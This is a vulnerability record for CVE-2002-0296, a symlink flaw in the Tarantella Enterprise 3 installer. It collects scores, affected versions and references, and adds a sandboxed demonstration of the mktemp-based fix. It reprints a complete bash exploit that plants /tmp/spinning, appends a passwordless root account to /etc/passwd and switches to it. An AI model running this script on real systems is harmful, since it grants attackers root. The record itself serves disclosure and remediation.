CVE-2002-0296
CVSS 1.2
Published: 2002-05-31 00:00:00
Last revised: 2016-10-17 22:18:35

[Original] The installation of Tarantella Enterprise 3 allows local users to overwrite arbitrary files via a symlink attack on the "spinning" temporary file.


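[CNNVD] Tarantella Enterprise 3 symbolic link vulnerability (CNNVD-200205-149)

        A vulnerability exists in the installation of Tarantella Enterprise 3. Local users can overwrite arbitrary files by means of a symbolic link attack on the "spinning" temporary file.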

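- CVSS (base score)

CVSS score: 1.2 [LOW]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on the availability of the system]
Attack complexity: HIGH [exploitation requires specific access conditions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]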

- CPE (affected platforms and products)

cpe:/a:tarantella:tarantella_enterprise:3.0
cpe:/a:tarantella:tarantella_enterprise:3.11
cpe:/a:tarantella:tarantella_enterprise:3.10
cpe:/a:tarantella:tarantella_enterprise:3.20
cpe:/a:tarantella:tarantella_enterprise:3.01

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0296
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0296
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-149
(Official data source) CNNVD

- Other links and resources

http://archives.neohapsis.com/archives/bugtraq/2002-02/0187.html
(VENDOR_ADVISORY)  BUGTRAQ  20020219 Another local root vulnerability during installation of Tarantella Enterprise 3.
http://marc.info/?l=bugtraq&m=101467193803592&w=2
(UNKNOWN)  BUGTRAQ  20020224 Exploit for Tarantella Enterprise installation (bid 4115)
http://www.securityfocus.com/bid/4115
(VENDOR_ADVISORY)  BID  4115
http://xforce.iss.net/xforce/xfdb/8223
(UNKNOWN)  XF  tarantella-tmp-spinning-symlink(8223)

- Vulnerability information

Tarantella Enterprise 3 symbolic link vulnerability
Low severity  Access validation error
2002-05-31 00:00:00 2005-10-20 00:00:00
Local

- Advisories and patches

        The vendor is reportedly aware of the vulnerability and plans to correct it in the next release.
        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Vulnerability information (21290)

Tarantella Enterprise 3 Symbolic Link Vulnerability (EDBID:21290)
unix local
2002-02-19 Verified
0 Larry W. Cashdollar
N/A
source: http://www.securityfocus.com/bid/4115/info

Tarantella Enterprise 3 contains a locally exploitable symbolic link vulnerability during its installation procedure.

This vulnerability can be exploited to elevate privileges. An attacker anticipating the install of Tarantella could create a symbolic link to any file as '/tmp/spinning'. When the installation utility is run, the file pointed to by the link will be made world writeable.

The attacker may gain root privileges by overwriting a file such as '/etc/passwd'.

#!/bin/bash
#Larry W. Cashdollar  lwc@vapid.dhs.org
#http://vapid.dhs.org
#Tarantella Enterprise 3 symlink local root Installation exploit
#For educational purposes only.
#tested on Linux.  run and wait.


echo "Creating symlink."

/bin/ln -s /etc/passwd /tmp/spinning

echo "Waiting for tarantella installation."

while true
do
echo -n .
if [ -w /etc/passwd ]
then
        echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
        su - tarexp
        exit
fi
done		
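
The installer-side fix for the '/tmp/spinning' issue described above, as an added example that is not part of the original record or of Tarantella's installer: it contrasts a fixed-name scratch file with a private mktemp directory, entirely inside a throwaway sandbox. The function names, and the assumption that the installer does a create-plus-chmod on the fixed path, are illustrative.

```shell
#!/bin/sh
# Added example, not Tarantella's installer code. Assumption: the installer
# does the equivalent of "create + chmod 666" on a fixed name in /tmp.

# Weak pattern: fixed name in a shared directory. Both the redirection and
# chmod follow a symlink that another user placed there beforehand.
weak_scratch() {
    : >> "$1/spinning"
    chmod 666 "$1/spinning"
}

# Hardened pattern: a private 0700 directory with an unpredictable name, so
# nobody else can pre-create anything at the path the installer writes to.
safe_scratch() {
    ( umask 077
      work=$(mktemp -d "$1/install.XXXXXX") || exit 1
      : > "$work/spinning" || exit 1
      printf '%s\n' "$work/spinning" )
}

# Pre-install audit: report a symlink already sitting at the fixed path.
# A check like this is racy on its own; safe_scratch is the actual fix.
planted_symlink() { [ -L "$1" ]; }

mode_of() { ls -ld "$1" | cut -c1-10; }

# Constructed demo in a throwaway sandbox (never touches real /tmp or /etc).
demo() {
    box=$(mktemp -d) || return 1
    mkdir "$box/tmp" "$box/etc"
    echo "root:x:0:0:root:/root:/bin/sh" > "$box/etc/passwd"
    chmod 644 "$box/etc/passwd"
    ln -s "$box/etc/passwd" "$box/tmp/spinning"   # link present before install

    planted_symlink "$box/tmp/spinning" && audit=symlink || audit=clean
    weak_scratch "$box/tmp"
    weak=$(mode_of "$box/etc/passwd")             # link target was chmod'ed

    chmod 644 "$box/etc/passwd"
    scratch=$(safe_scratch "$box/tmp") || return 1
    safe=$(mode_of "$box/etc/passwd")             # link target left alone
    smode=$(mode_of "$scratch")
    rm -rf "$box"
    echo "audit=$audit weak=$weak safe=$safe scratch=$smode"
}

demo
```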

- Vulnerability information

13949
Tarantella Enterprise spinning Symlink Arbitrary File Overwrite
Local Access Required Race Condition
Loss of Integrity Solution Unknown
Exploit Public Third-party Verified, Uncoordinated Disclosure

- Vulnerability description

- Timeline

2002-02-19 Unknown
2002-02-19 Unknown

- Solution

OSVDB is not aware of a solution for this vulnerability.

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Tarantella Enterprise 3 Symbolic Link Vulnerability
Access Validation Error 4115
No Yes
2002-02-19 12:00:00 2009-07-11 10:56:00
Discovered by Larry W. Cashdollar of Vapid Labs.

- Affected program versions

Tarantella Enterprise 3 3.20 0
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0 4
- HP HP-UX 11.0
- IBM AIX 4.3.3
- IBM AIX 5.1
- Red Hat Linux 6.2
- RedHat Linux 7.2
- RedHat Linux 7.1
- RedHat Linux 7.0
- S.u.S.E. Linux 7.3
- S.u.S.E. Linux 7.2
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SCO eServer 2.3.1
- SCO eServer 2.3
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Tarantella Enterprise 3 3.11
- Compaq Tru64 4.0 d
- HP HP-UX 11.20
- HP HP-UX 11.11
- HP HP-UX 11.0 4
- HP HP-UX 11.0
- HP HP-UX 10.34
- HP HP-UX 10.30
- HP HP-UX 10.26
- HP HP-UX 10.24
- HP HP-UX 10.20
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- IBM AIX 4.3.1
- IBM AIX 4.3
- IBM AIX 5.1
- Red Hat Linux 6.2
- RedHat Linux 7.2
- RedHat Linux 7.1
- RedHat Linux 7.0
- S.u.S.E. Linux 7.3
- S.u.S.E. Linux 7.2
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- S.u.S.E. Linux 6.3
- SCO eServer 2.3.1
- SCO eServer 2.3
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Tarantella Enterprise 3 3.10
Tarantella Enterprise 3 3.0 1
Tarantella Enterprise 3 3.0

- Exploit

An exploit has been published:
